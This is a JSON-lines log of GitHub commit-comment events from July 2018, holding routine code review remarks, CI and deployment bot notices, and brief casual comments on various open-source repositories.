{"id":"8029745050","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29861210,"position":null,"line":null,"path":null,"commit_id":"0342cdf8e66d9c01a4a587529327a51e3abcd419","created_at":"2018-07-27T17:05:48Z","updated_at":"2018-07-27T17:05:48Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-990](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-990).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-990-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-27T17:05:48Z"}
{"id":"8029749644","type":"CommitCommentEvent","actor":{"login":"vibhanshuchaudhary"},"repo":{"name":"vibhanshuchaudhary/HackNightIndia"},"payload":{"comment":{"id":29861218,"position":null,"line":null,"path":null,"commit_id":"ec3ae7a14cfecfeb7eba95e4714b81320b46c803","created_at":"2018-07-27T17:06:49Z","updated_at":"2018-07-27T17:06:49Z","author_association":"OWNER","body":"**blink of eyes**"}},"created_at":"2018-07-27T17:06:49Z"}
{"id":"8029750584","type":"CommitCommentEvent","actor":{"login":"Kamal901"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29861221,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-27T17:07:03Z","updated_at":"2018-07-27T17:07:03Z","author_association":"NONE","body":"good job guys"}},"created_at":"2018-07-27T17:07:03Z"}
{"id":"8029756090","type":"CommitCommentEvent","actor":{"login":"sergeyf"},"repo":{"name":"iskandr/fancyimpute"},"payload":{"comment":{"id":29861235,"position":5,"line":32,"path":"fancyimpute/nuclear_norm_minimization.py","commit_id":"2005d02fdab3f3a5db80f412ec213b8984c0c9ef","created_at":"2018-07-27T17:08:16Z","updated_at":"2018-07-27T17:08:16Z","author_association":"COLLABORATOR","body":"Turns out that for nuclear norm minimization only SCS will work in any case so we don't need this.\r\n\r\nBut we do need max_iters because tests were failing when this value was too small."}},"created_at":"2018-07-27T17:08:16Z"}
{"id":"8029758139","type":"CommitCommentEvent","actor":{"login":"sergeyf"},"repo":{"name":"iskandr/fancyimpute"},"payload":{"comment":{"id":29861239,"position":6,"line":33,"path":"test/test_nuclear_norm_minimization.py","commit_id":"2005d02fdab3f3a5db80f412ec213b8984c0c9ef","created_at":"2018-07-27T17:08:41Z","updated_at":"2018-07-27T17:08:41Z","author_association":"COLLABORATOR","body":"I don't know why this tiny problem needs so many iters, but it did on my machine."}},"created_at":"2018-07-27T17:08:41Z"}
{"id":"8029759516","type":"CommitCommentEvent","actor":{"login":"nukeop"},"repo":{"name":"nukeop/smash"},"payload":{"comment":{"id":29861241,"position":null,"line":null,"path":null,"commit_id":"29151553ccdfd97b51f614d1597c9d76a09d8a60","created_at":"2018-07-27T17:08:57Z","updated_at":"2018-07-27T17:08:57Z","author_association":"OWNER","body":"Yeah, Unix line endings are correct. Feel free to change them wherever you find them."}},"created_at":"2018-07-27T17:08:57Z"}
{"id":"8029764857","type":"CommitCommentEvent","actor":{"login":"AndreiNekrasOn"},"repo":{"name":"AndreiNekrasOn/site_est"},"payload":{"comment":{"id":29861257,"position":null,"line":null,"path":null,"commit_id":"fc2ae2338b7ab15810924f7ebc9126ff8436e1fd","created_at":"2018-07-27T17:10:07Z","updated_at":"2018-07-27T17:10:07Z","author_association":"OWNER","body":"Also added cool scrollbar"}},"created_at":"2018-07-27T17:10:07Z"}
{"id":"8029765589","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29861264,"position":null,"line":null,"path":null,"commit_id":"751e7cb24210a86a9db763d794d1f929df4672db","created_at":"2018-07-27T17:10:15Z","updated_at":"2018-07-27T17:10:15Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-298](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-298).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-298-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-27T17:10:15Z"}
{"id":"8029776073","type":"CommitCommentEvent","actor":{"login":"Redorb"},"repo":{"name":"aymanbagabas/aymanbagabas.github.io"},"payload":{"comment":{"id":29861287,"position":9,"line":9,"path":"_posts/2018/2018-07-23-archlinux-on-matebook-x-pro.md","commit_id":"e0034bc85b8d9f5a0f20f59fb19ceeaf14aa35f8","created_at":"2018-07-27T17:12:34Z","updated_at":"2018-07-27T17:12:34Z","author_association":"NONE","body":"Sorry for the random comment, but I've been looking at who else is running linux on this laptop. You can fix this issue with hdajackretasker, this is my config:\r\n![image](https://user-images.githubusercontent.com/552305/43336308-75d80baa-9185-11e8-8246-098aec51ec86.png)\r\nYou'll need to click install boot override after this. The speakers are still pretty quiet though, but they work."}},"created_at":"2018-07-27T17:12:34Z"}
{"id":"8029777179","type":"CommitCommentEvent","actor":{"login":"SeaRoll"},"repo":{"name":"SeaRoll/ZiboCopilot"},"payload":{"comment":{"id":29861291,"position":null,"line":null,"path":null,"commit_id":"8edc801e8ce7b328d6c1584907576efb5940495f","created_at":"2018-07-27T17:12:49Z","updated_at":"2018-07-27T17:12:49Z","author_association":"OWNER","body":"do these changes to development first and then pull"}},"created_at":"2018-07-27T17:12:49Z"}
{"id":"8029780418","type":"CommitCommentEvent","actor":{"login":"bitwiseman"},"repo":{"name":"jenkinsci/jep"},"payload":{"comment":{"id":29861299,"position":91,"line":91,"path":"jep/8/README.adoc","commit_id":"b7fe523450c1c34a57c61923695d3b9049280dff","created_at":"2018-07-27T17:13:31Z","updated_at":"2018-07-27T17:13:31Z","author_association":"CONTRIBUTOR","body":"@martinda  Please file a PR with any changes. \r\nTo mangle a quote: PR change you want to see in the JEP."}},"created_at":"2018-07-27T17:13:31Z"}
{"id":"8029782880","type":"CommitCommentEvent","actor":{"login":"bitwiseman"},"repo":{"name":"jenkinsci/jep"},"payload":{"comment":{"id":29861304,"position":113,"line":113,"path":"jep/8/README.adoc","commit_id":"b7fe523450c1c34a57c61923695d3b9049280dff","created_at":"2018-07-27T17:14:04Z","updated_at":"2018-07-27T17:14:04Z","author_association":"CONTRIBUTOR","body":"@martinda  This is definitely something you should PR. :)"}},"created_at":"2018-07-27T17:14:04Z"}
{"id":"8029787135","type":"CommitCommentEvent","actor":{"login":"JonathanHaas"},"repo":{"name":"JonathanHaas/penn-today-ci"},"payload":{"comment":{"id":29861318,"position":null,"line":null,"path":null,"commit_id":"92b0982f36606122f6750c557cfe9a4e033dffee","created_at":"2018-07-27T17:14:59Z","updated_at":"2018-07-27T17:14:59Z","author_association":"OWNER","body":"Created multidev environment [penn-today-ci#pr-184](https://dashboard.pantheon.io/sites/4efb815f-6135-4a6f-97a8-9a974be0bd7a#pr-184).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-184-penn-today-ci.pantheonsite.io/)"}},"created_at":"2018-07-27T17:14:59Z"}
{"id":"8029788721","type":"CommitCommentEvent","actor":{"login":"bitwiseman"},"repo":{"name":"jenkinsci/jep"},"payload":{"comment":{"id":29861327,"position":133,"line":133,"path":"jep/8/README.adoc","commit_id":"b7fe523450c1c34a57c61923695d3b9049280dff","created_at":"2018-07-27T17:15:19Z","updated_at":"2018-07-27T17:15:19Z","author_association":"CONTRIBUTOR","body":"@martinda  How do you think this should be done?  Please propose a solution in PR and we can use that as a starting point. \r\n"}},"created_at":"2018-07-27T17:15:19Z"}
{"id":"8029789588","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-spring-archetypes"},"payload":{"comment":{"id":29861329,"position":null,"line":null,"path":null,"commit_id":"5c8c4358cf02ad2a087229df3fbd532476dc9576","created_at":"2018-07-27T17:15:30Z","updated_at":"2018-07-27T17:15:30Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-spring-archetypes :: BuildTest [Build 60](https://teamcity.otenv.com/viewLog.html?buildId=9017566&buildTypeId=ArchitectureTeam_JavaPlatform_OtjSpringArchetypes_Buil) is now running\n"}},"created_at":"2018-07-27T17:15:30Z"}
{"id":"8029794215","type":"CommitCommentEvent","actor":{"login":"matthewbauer"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29861337,"position":null,"line":null,"path":null,"commit_id":"3342f717da7f660b4695f09034abc175a14fda24","created_at":"2018-07-27T17:16:28Z","updated_at":"2018-07-27T17:16:28Z","author_association":"MEMBER","body":"Hey @vcunat,\r\n\r\nI am wondering if there was a rationale to only putting one output in ```outputsToInstall```? I am considering putting all of outputs in it, considering the many complaints we get when someone doesn't understand why there are missing files in their install. This seems like it would be harmless to, considering that it only effects ```nix-env -i``` usage.\r\n\r\n6bacbcb6b69d5b9771da768fbf4226f9f1a0b64d"}},"created_at":"2018-07-27T17:16:28Z"}
{"id":"8029795880","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-spring-archetypes"},"payload":{"comment":{"id":29861344,"position":null,"line":null,"path":null,"commit_id":"5c8c4358cf02ad2a087229df3fbd532476dc9576","created_at":"2018-07-27T17:16:50Z","updated_at":"2018-07-27T17:16:50Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-spring-archetypes :: BuildTest [Build 60](https://teamcity.otenv.com/viewLog.html?buildId=9017566&buildTypeId=ArchitectureTeam_JavaPlatform_OtjSpringArchetypes_Buil) outcome was **SUCCESS**\nSummary: Running Build time: 00:01:19"}},"created_at":"2018-07-27T17:16:50Z"}
{"id":"8029800998","type":"CommitCommentEvent","actor":{"login":"bitwiseman"},"repo":{"name":"jenkinsci/jep"},"payload":{"comment":{"id":29861356,"position":null,"line":null,"path":null,"commit_id":"b7fe523450c1c34a57c61923695d3b9049280dff","created_at":"2018-07-27T17:17:57Z","updated_at":"2018-07-27T17:17:57Z","author_association":"CONTRIBUTOR","body":"@martinda I'm glad that your taking an interest in this JEP, please submit a PR (or more).   Thanks!\r\n"}},"created_at":"2018-07-27T17:17:57Z"}
{"id":"8029807534","type":"CommitCommentEvent","actor":{"login":"johnjohnlo"},"repo":{"name":"bitcoin/bitcoin"},"payload":{"comment":{"id":29861373,"position":null,"line":null,"path":null,"commit_id":"faaf49147ca797985f871fea664f5b7427dbf952","created_at":"2018-07-27T17:19:21Z","updated_at":"2018-07-27T17:19:21Z","author_association":"NONE","body":";));:"}},"created_at":"2018-07-27T17:19:21Z"}
{"id":"8029808802","type":"CommitCommentEvent","actor":{"login":"gscott58"},"repo":{"name":"gscott58/my-github-repo"},"payload":{"comment":{"id":29861376,"position":null,"line":null,"path":null,"commit_id":"fdd7ddf95a66031e51eed767e9c84ae7fdeef531","created_at":"2018-07-27T17:19:38Z","updated_at":"2018-07-27T17:19:38Z","author_association":"OWNER","body":"Greeting changed from \"Hello World!\" to \"Hello Everyone!\""}},"created_at":"2018-07-27T17:19:38Z"}
{"id":"8029810340","type":"CommitCommentEvent","actor":{"login":"dvc94ch"},"repo":{"name":"riscv-rust/rust"},"payload":{"comment":{"id":29861382,"position":42,"line":42,"path":"src/librustc_target/abi/call/riscv.rs","commit_id":"16999338b28c31af34956017831c98ca93d2f507","created_at":"2018-07-27T17:19:59Z","updated_at":"2018-07-27T17:19:59Z","author_association":"MEMBER","body":"yes makes sense. can't remember what I was thinking when I wrote it..."}},"created_at":"2018-07-27T17:19:59Z"}
{"id":"8029811885","type":"CommitCommentEvent","actor":{"login":"PCDCfranklin"},"repo":{"name":"PCDCfranklin/MAX30102_FUNCLIB"},"payload":{"comment":{"id":29861385,"position":null,"line":null,"path":null,"commit_id":"87bb525784184ac535a919a358978f16afa05501","created_at":"2018-07-27T17:20:18Z","updated_at":"2018-07-27T17:20:18Z","author_association":"OWNER","body":"Moved to library folder"}},"created_at":"2018-07-27T17:20:18Z"}
{"id":"8029853712","type":"CommitCommentEvent","actor":{"login":"andrasnyarai"},"repo":{"name":"marcidelux/kkhc"},"payload":{"comment":{"id":29861485,"position":3,"line":3,"path":"server/helpers/activeUsers.js","commit_id":"db78b06de23c43cd7edad9421ed4706b6979e1d6","created_at":"2018-07-27T17:29:30Z","updated_at":"2018-07-27T17:29:30Z","author_association":"COLLABORATOR","body":"===  az smafu?"}},"created_at":"2018-07-27T17:29:30Z"}
{"id":"8029853815","type":"CommitCommentEvent","actor":{"login":"mariateresapaez"},"repo":{"name":"mariateresapaez/TestAPI"},"payload":{"comment":{"id":29861486,"position":null,"line":null,"path":null,"commit_id":"b740fdf5aeeb5527693f41744bac6ea20adcae9f","created_at":"2018-07-27T17:29:31Z","updated_at":"2018-07-27T17:29:31Z","author_association":"OWNER","body":"Apis for testing"}},"created_at":"2018-07-27T17:29:31Z"}
{"id":"8029855353","type":"CommitCommentEvent","actor":{"login":"arichardson"},"repo":{"name":"CTSRD-CHERI/llvm"},"payload":{"comment":{"id":29861491,"position":6,"line":296,"path":"lib/Transforms/CHERICap/FoldCapIntrinsics.cpp","commit_id":"472034857d0d258a90e2e1f4a5037ff82c726f6f","created_at":"2018-07-27T17:29:52Z","updated_at":"2018-07-27T17:29:52Z","author_association":"MEMBER","body":"Will this always be an instruction? Couldn't it be a global or null? Maybe better to use dyn_cast?\r\n\r\nAlso do you have a test case for this?"}},"created_at":"2018-07-27T17:29:52Z"}
{"id":"8029856947","type":"CommitCommentEvent","actor":{"login":"andrasnyarai"},"repo":{"name":"marcidelux/kkhc"},"payload":{"comment":{"id":29861494,"position":148,"line":135,"path":"server/router/controllers/NavigationController.js","commit_id":"db78b06de23c43cd7edad9421ed4706b6979e1d6","created_at":"2018-07-27T17:30:13Z","updated_at":"2018-07-27T17:30:13Z","author_association":"COLLABORATOR","body":"uh... : )"}},"created_at":"2018-07-27T17:30:13Z"}
{"id":"8029859020","type":"CommitCommentEvent","actor":{"login":"rjw57"},"repo":{"name":"uisautomation/sms-webapp"},"payload":{"comment":{"id":29861501,"position":87,"line":126,"path":"api/tests/test_views.py","commit_id":"c35be11408ee34092f6b84459e8639d67a569168","created_at":"2018-07-27T17:30:38Z","updated_at":"2018-07-27T17:30:38Z","author_association":"MEMBER","body":"This tests the view logic, not that viewable_by_user is correct, only that the view returns the same results as it. The test that viewable_by_user is correct is elsewhere."}},"created_at":"2018-07-27T17:30:38Z"}
{"id":"8029860348","type":"CommitCommentEvent","actor":{"login":"rjw57"},"repo":{"name":"uisautomation/sms-webapp"},"payload":{"comment":{"id":29861508,"position":105,"line":137,"path":"api/tests/test_views.py","commit_id":"c35be11408ee34092f6b84459e8639d67a569168","created_at":"2018-07-27T17:30:55Z","updated_at":"2018-07-27T17:30:55Z","author_association":"MEMBER","body":"Same reply."}},"created_at":"2018-07-27T17:30:55Z"}
{"id":"8029860523","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29861509,"position":null,"line":null,"path":null,"commit_id":"e4ef0b6dfe28c833451809e5a142e23109ee026c","created_at":"2018-07-27T17:30:58Z","updated_at":"2018-07-27T17:30:58Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-993](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-993).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-993-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-27T17:30:58Z"}
{"id":"8029860618","type":"CommitCommentEvent","actor":{"login":"danall1989"},"repo":{"name":"danall1989/tiny-VBA"},"payload":{"comment":{"id":29861510,"position":null,"line":null,"path":null,"commit_id":"7e8361d6a9b8321723469baae79aa1f79f90c1df","created_at":"2018-07-27T17:31:00Z","updated_at":"2018-07-27T17:31:00Z","author_association":"OWNER","body":"Commit was made mistakenly added to master."}},"created_at":"2018-07-27T17:31:00Z"}
{"id":"8029861791","type":"CommitCommentEvent","actor":{"login":"petrolifero"},"repo":{"name":"rain-1/racket-peg"},"payload":{"comment":{"id":29861511,"position":null,"line":null,"path":null,"commit_id":"084888a35e9b5e7118e5e5d97ea6357f8c3cb992","created_at":"2018-07-27T17:31:14Z","updated_at":"2018-07-27T17:31:14Z","author_association":"CONTRIBUTOR","body":"This is so embarrassing.\r\n :D"}},"created_at":"2018-07-27T17:31:14Z"}
{"id":"8029861933","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29861512,"position":null,"line":null,"path":null,"commit_id":"3ad413f8827714ee05df13497fbe96f06fba5f52","created_at":"2018-07-27T17:31:16Z","updated_at":"2018-07-27T17:31:16Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-298](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-298).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-298-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-27T17:31:16Z"}
{"id":"8029864193","type":"CommitCommentEvent","actor":{"login":"DiegoBarney"},"repo":{"name":"DiegoBarney/Hellow-world"},"payload":{"comment":{"id":29861522,"position":2,"line":2,"path":"README.md","commit_id":"e3954f6ba18fd15010a91e6c88dd5361b18fa712","created_at":"2018-07-27T17:31:44Z","updated_at":"2018-07-27T17:31:44Z","author_association":"OWNER","body":"teste"}},"created_at":"2018-07-27T17:31:44Z"}
{"id":"8029864428","type":"CommitCommentEvent","actor":{"login":"martinda"},"repo":{"name":"jenkinsci/jep"},"payload":{"comment":{"id":29861523,"position":null,"line":null,"path":null,"commit_id":"b7fe523450c1c34a57c61923695d3b9049280dff","created_at":"2018-07-27T17:31:47Z","updated_at":"2018-07-27T17:31:47Z","author_association":"CONTRIBUTOR","body":"@oleg-nenashev and @bitwiseman sure I can provide a PR. I will do that later today or tomorrow."}},"created_at":"2018-07-27T17:31:47Z"}
{"id":"8029865682","type":"CommitCommentEvent","actor":{"login":"micahu"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29861526,"position":48,"line":30,"path":"test/account-mgmt.test.js","commit_id":"a7fb2073da69ebfcd37576b6a256321f2ff52261","created_at":"2018-07-27T17:32:02Z","updated_at":"2018-07-27T17:32:02Z","author_association":"OWNER","body":"i need the initial ```weiAmount``` to remain as a number type b/c can't send a BigNumber to ```SplitFunds()```\r\n(can we even send BigNumber as arg to contract functions?)\r\ni'll do ```const bn_weiAmount = new BigNumber(weiAmount)```"}},"created_at":"2018-07-27T17:32:02Z"}
{"id":"8029868918","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29861532,"position":null,"line":null,"path":null,"commit_id":"828bc8d267092d59df6bdd092ac3df010bf95982","created_at":"2018-07-27T17:32:44Z","updated_at":"2018-07-27T17:32:44Z","author_association":"COLLABORATOR","body":"Puzzle `1214-eb4dd687` discovered in   [`src/main/groovy/com/zerocracy/stk/pm/staff/elections/elect_performer.groovy`](  https://github.com/zerocracy/farm/blob/master/src/main/groovy/com/zerocracy/stk/pm/staff/elections/elect_performer.groovy)   and submitted as #1492. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-27T17:32:44Z"}
{"id":"8029869458","type":"CommitCommentEvent","actor":{"login":"rjw57"},"repo":{"name":"uisautomation/sms-webapp"},"payload":{"comment":{"id":29861534,"position":58,"line":44,"path":"ui/tests/test_views.py","commit_id":"c35be11408ee34092f6b84459e8639d67a569168","created_at":"2018-07-27T17:32:52Z","updated_at":"2018-07-27T17:32:52Z","author_association":"MEMBER","body":"Yup, the one adding ACL checking (issue #127 closed by #157). Note that this PR has an empty implementation for viewable_by_user."}},"created_at":"2018-07-27T17:32:52Z"}
{"id":"8029870090","type":"CommitCommentEvent","actor":{"login":"lwander"},"repo":{"name":"ttomsu/clouddriver"},"payload":{"comment":{"id":29861535,"position":64,"line":55,"path":"settings.gradle","commit_id":"d2a4fbd9631a6675000fb41ee2cf38f57b1a0263","created_at":"2018-07-27T17:33:01Z","updated_at":"2018-07-27T17:33:01Z","author_association":"COLLABORATOR","body":"Why not just break it out into GCE, GAE, and Kubernetes? "}},"created_at":"2018-07-27T17:33:01Z"}
{"id":"8029871578","type":"CommitCommentEvent","actor":{"login":"lwander"},"repo":{"name":"ttomsu/clouddriver"},"payload":{"comment":{"id":29861539,"position":76,"line":67,"path":"settings.gradle","commit_id":"d2a4fbd9631a6675000fb41ee2cf38f57b1a0263","created_at":"2018-07-27T17:33:19Z","updated_at":"2018-07-27T17:33:19Z","author_association":"COLLABORATOR","body":"Is \"netflix\" a platform?"}},"created_at":"2018-07-27T17:33:19Z"}
{"id":"8029872603","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"PerseusDL/canonical-greekLit"},"payload":{"comment":{"id":29861542,"position":null,"line":null,"path":null,"commit_id":"a79441315b02cb202b6e3d2e95e56abfde8f4bda","created_at":"2018-07-27T17:33:33Z","updated_at":"2018-07-27T17:33:33Z","author_association":"NONE","body":"## Global\n\n| Changed            |   Status |\n|:-------------------|---------:|\n| `coverage`         |     1.49 |\n| `metadata_passing` |    62    |\n| `metadata_total`   |    62    |\n\n## Units\n\n| Changed                             | Status   |\n|:------------------------------------|:---------|\n| `./data/tlg0014/tlg001/__cts__.xml` | New      |\n| `./data/tlg0014/tlg002/__cts__.xml` | New      |\n| `./data/tlg0014/tlg003/__cts__.xml` | New      |\n| `./data/tlg0014/tlg005/__cts__.xml` | New      |\n| `./data/tlg0014/tlg006/__cts__.xml` | New      |\n| `./data/tlg0014/tlg007/__cts__.xml` | New      |\n| `./data/tlg0014/tlg008/__cts__.xml` | New      |\n| `./data/tlg0014/tlg009/__cts__.xml` | New      |\n| `./data/tlg0014/tlg010/__cts__.xml` | New      |\n| `./data/tlg0014/tlg011/__cts__.xml` | New      |\n| `./data/tlg0014/tlg012/__cts__.xml` | New      |\n| `./data/tlg0014/tlg013/__cts__.xml` | New      |\n| `./data/tlg0014/tlg014/__cts__.xml` | New      |\n| `./data/tlg0014/tlg015/__cts__.xml` | New      |\n| `./data/tlg0014/tlg016/__cts__.xml` | New      |\n| `./data/tlg0014/tlg017/__cts__.xml` | New      |\n| `./data/tlg0014/tlg018/__cts__.xml` | New      |\n| `./data/tlg0014/tlg019/__cts__.xml` | New      |\n| `./data/tlg0014/tlg020/__cts__.xml` | New      |\n| `./data/tlg0014/tlg021/__cts__.xml` | New      |\n| `./data/tlg0014/tlg022/__cts__.xml` | New      |\n| `./data/tlg0014/tlg023/__cts__.xml` | New      |\n| `./data/tlg0014/tlg024/__cts__.xml` | New      |\n| `./data/tlg0014/tlg025/__cts__.xml` | New      |\n| `./data/tlg0014/tlg026/__cts__.xml` | New      |\n| `./data/tlg0014/tlg027/__cts__.xml` | New      |\n| `./data/tlg0014/tlg028/__cts__.xml` | New      |\n| `./data/tlg0014/tlg029/__cts__.xml` | New      |\n| `./data/tlg0014/tlg030/__cts__.xml` | New      |\n| `./data/tlg0014/tlg031/__cts__.xml` | New      |\n| `./data/tlg0014/tlg032/__cts__.xml` | New      |\n| `./data/tlg0014/tlg033/__cts__.xml` | New      |\n| `./data/tlg0014/tlg034/__cts__.xml` | New      |\n| `./data/tlg0014/tlg035/__cts__.xml` | New      |\n| `./data/tlg0014/tlg036/__cts__.xml` | New      |\n| `./data/tlg0014/tlg037/__cts__.xml` | New      |\n| `./data/tlg0014/tlg038/__cts__.xml` | New      |\n| `./data/tlg0014/tlg039/__cts__.xml` | New      |\n| `./data/tlg0014/tlg040/__cts__.xml` | New      |\n| `./data/tlg0014/tlg041/__cts__.xml` | New      |\n| `./data/tlg0014/tlg042/__cts__.xml` | New      |\n| `./data/tlg0014/tlg043/__cts__.xml` | New      |\n| `./data/tlg0014/tlg044/__cts__.xml` | New      |\n| `./data/tlg0014/tlg045/__cts__.xml` | New      |\n| `./data/tlg0014/tlg046/__cts__.xml` | New      |\n| `./data/tlg0014/tlg047/__cts__.xml` | New      |\n| `./data/tlg0014/tlg048/__cts__.xml` | New      |\n| `./data/tlg0014/tlg049/__cts__.xml` | New      |\n| `./data/tlg0014/tlg050/__cts__.xml` | New      |\n| `./data/tlg0014/tlg051/__cts__.xml` | New      |\n| `./data/tlg0014/tlg052/__cts__.xml` | New      |\n| `./data/tlg0014/tlg053/__cts__.xml` | New      |\n| `./data/tlg0014/tlg054/__cts__.xml` | New      |\n| `./data/tlg0014/tlg055/__cts__.xml` | New      |\n| `./data/tlg0014/tlg056/__cts__.xml` | New      |\n| `./data/tlg0014/tlg057/__cts__.xml` | New      |\n| `./data/tlg0014/tlg058/__cts__.xml` | New      |\n| `./data/tlg0014/tlg059/__cts__.xml` | New      |\n| `./data/tlg0014/tlg060/__cts__.xml` | New      |\n| `./data/tlg0014/tlg061/__cts__.xml` | New      |\n| `./data/tlg0014/tlg062/__cts__.xml` | New      |\n| `./data/tlg0014/tlg063/__cts__.xml` | New      |\n| `./data/tlg0014/tlg001/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg002/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg003/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg005/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg006/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg007/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg008/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg009/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg010/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg011/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg012/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg013/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg014/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg015/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg016/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg017/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg018/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg019/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg020/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg021/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg022/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg023/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg024/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg025/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg026/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg027/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg028/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg029/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg030/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg031/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg032/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg033/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg034/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg035/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg036/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg037/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg038/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg039/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg040/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg041/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg042/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg043/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg044/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg045/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg046/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg047/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg048/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg049/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg050/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg051/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg052/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg053/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg054/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg055/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg056/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg057/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg058/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg059/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg060/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg061/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg062/__cts__.xml` | Passing  |\n| `./data/tlg0014/tlg063/__cts__.xml` | Passing  |\n\n*[Hook UI build recap](http://ci.perseids.org/repo/PerseusDL/canonical-greekLit/4493)*\n"}},"created_at":"2018-07-27T17:33:33Z"}
